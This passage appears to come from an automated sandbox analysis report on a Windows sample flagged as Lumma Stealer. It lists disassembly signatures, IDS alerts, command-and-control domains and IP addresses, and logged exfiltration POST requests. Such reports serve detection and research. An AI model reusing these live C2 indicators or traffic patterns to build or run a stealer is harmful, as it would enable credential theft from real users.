Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+38h] | 0_2_0249CB7E
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h | 0_2_024B5BF7
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx ecx, di | 0_2_024B5BF7
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov ecx, eax | 0_2_0249ABA7
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov edx, ecx | 0_2_0249ABA7
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h] | 0_2_024BB75E
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov ecx, eax | 0_2_024BB75E
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov ecx, eax | 0_2_024A4806
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then cmp word ptr [ebx+ecx], 0000h | 0_2_024B0817
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 0_2_024C3897
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov byte ptr [esi], cl | 0_2_024BC8B1
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov byte ptr [esi], cl | 0_2_024BC94B
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-78E52646h] | 0_2_02499967
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx edi, byte ptr [esp+eax-46h] | 0_2_02499967
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx+16h] | 0_2_02499967
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov word ptr [eax], cx | 0_2_024A6907
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov eax, edx | 0_2_024AC921
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then movzx edi, byte ptr [esp+ecx+0233DBB1h] | 0_2_024B89C0
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then mov edx, dword ptr [ebp-10h] | 0_2_024CA9DE
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch | 0_2_024A99D7
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh | 0_2_024A99D7
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh | 0_2_024A99D7
Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h | 0_2_024A99D7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h0_2_024A99D7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B7C1BB11h0_2_024A99D7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh0_2_024A99D7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h0_2_024A99D7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_024BC98D
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_024BC99C
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov ebp, dword ptr [eax]0_2_024C6E67
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov word ptr [eax], dx0_2_024A5F79
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov ecx, eax0_2_024B1F77
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov word ptr [ebx], dx0_2_024A8F35
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov word ptr [ebx], cx0_2_024A8F35
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], E88DDEA1h0_2_024CCFC7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx edi, byte ptr [edx+ecx]0_2_0249DF8C
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movsx eax, byte ptr [esi]0_2_024CBC08
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_024B9C17
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]0_2_024AEC17
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh0_2_024C6C3B
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov esi, eax0_2_024B3C9B
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov ecx, eax0_2_024CAD19
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h0_2_024CCD87

                    Networking

Source: Network traffic | Suricata IDS: 2058588 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scentniej .buzz) : 192.168.2.6:64950 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058580 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inherineau .buzz) : 192.168.2.6:54375 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058572 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appliacnesot .buzz) : 192.168.2.6:59569 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058576 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cashfuzysao .buzz) : 192.168.2.6:63909 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058586 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebuildeso .buzz) : 192.168.2.6:54503 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058590 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (screwamusresz .buzz) : 192.168.2.6:54142 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058578 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hummskitnj .buzz) : 192.168.2.6:61581 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058584 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (prisonyfork .buzz) : 192.168.2.6:56116 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:49708 -> 23.55.153.106:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49710 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49716 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49710 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49716 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49722 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49737 -> 172.67.157.254:443
Source: Malware configuration extractor | URLs: scentniej.buzz
Source: Malware configuration extractor | URLs: screwamusresz.buzz
Source: Malware configuration extractor | URLs: appliacnesot.buzz
Source: Malware configuration extractor | URLs: inherineau.buzz
Source: Malware configuration extractor | URLs: hummskitnj.buzz
Source: Malware configuration extractor | URLs: rebuildeso.buzz
Source: Malware configuration extractor | URLs: cashfuzysao.buzz
Source: Malware configuration extractor | URLs: prisonyfork.buzz
Source: Joe Sandbox View | IP Address: 104.21.66.86
Source: Joe Sandbox View | IP Address: 172.67.157.254
Source: Joe Sandbox View | IP Address: 23.55.153.106
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49716 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49708 -> 23.55.153.106:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49728 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49710 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49722 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49737 -> 172.67.157.254:443
Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: steamcommunity.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 74 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=OVN8F7K2V | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12800 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=12MYHXJSEBX | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15058 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=2520NUERQYQ21JEFV9 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 19958 | Host: lev-tolstoi.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=378308b36cb3d3ce49665561; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35121Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveSat, 28 Dec 2024 08:58:58 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control | equals www.youtube.com (Youtube)
Source: global traffic | DNS traffic detected: DNS query: cashfuzysao.buzz
Source: global traffic | DNS traffic detected: DNS query: prisonyfork.buzz
Source: global traffic | DNS traffic detected: DNS query: rebuildeso.buzz
Source: global traffic | DNS traffic detected: DNS query: scentniej.buzz
Source: global traffic | DNS traffic detected: DNS query: inherineau.buzz
Source: global traffic | DNS traffic detected: DNS query: screwamusresz.buzz
Source: global traffic | DNS traffic detected: DNS query: appliacnesot.buzz
Source: global traffic | DNS traffic detected: DNS query: hummskitnj.buzz
Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic | DNS traffic detected: DNS query: lev-tolstoi.com
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: lev-tolstoi.com
Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:27060
Source: 5Z19n7XRT1.exe, 00000000.00000003.2292863333.0000000003063000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 5Z19n7XRT1.exe, 00000000.00000003.2292863333.0000000003063000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: 5Z19n7XRT1.exe, 00000000.00000003.2292863333.0000000003063000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: 5Z19n7XRT1.exe, 00000000.00000003.2292863333.0000000003063000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 5Z19n7XRT1.exe, 00000000.00000003.2292863333.0000000003063000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 5Z19n7XRT1.exe, 00000000.00000003.2292863333.0000000003063000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: 5Z19n7XRT1.exe, 00000000.00000003.2292863333.0000000003063000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: 5Z19n7XRT1.exe, 00000000.00000003.2292863333.0000000003063000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: 5Z19n7XRT1.exe, 00000000.00000003.2292863333.0000000003063000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: 5Z19n7XRT1.exe, 00000000.00000003.2199960919.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: 5Z19n7XRT1.exe, 00000000.00000003.2199960919.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2245459003.000000000303D000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: 5Z19n7XRT1.exe, 00000000.00000003.2199960919.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.5.dr | String found in binary or memory: http://upx.sf.net
Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 5Z19n7XRT1.exe, 00000000.00000003.2292863333.0000000003063000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: 5Z19n7XRT1.exe, 00000000.00000003.2292863333.0000000003063000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: 5Z19n7XRT1.exe, 00000000.00000003.2270340473.0000000003065000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246176841.0000000003064000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246499324.0000000003065000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246052766.000000000307B000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2270388935.0000000003065000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.steampowered.com/
Source: 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: 5Z19n7XRT1.exe, 00000000.00000003.2270340473.0000000003065000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246176841.0000000003064000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246499324.0000000003065000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246052766.000000000307B000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2270388935.0000000003065000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2200239733.000000000095A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: 5Z19n7XRT1.exe, 00000000.00000003.2270340473.0000000003065000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246176841.0000000003064000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246499324.0000000003065000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246052766.000000000307B000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2270388935.0000000003065000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 5Z19n7XRT1.exe, 00000000.00000003.2270340473.0000000003065000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246176841.0000000003064000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246499324.0000000003065000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246052766.000000000307B000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2270388935.0000000003065000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://checkout.steampowered.com/
Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2200239733.000000000095A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/
Source: 5Z19n7XRT1.exe, 00000000.00000003.2199960919.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
Source: 5Z19n7XRT1.exe, 00000000.00000003.2199960919.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: 5Z19n7XRT1.exe, 00000000.00000003.2199960919.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2245459003.000000000303D000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: 5Z19n7XRT1.exe, 00000000.00000003.2199960919.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
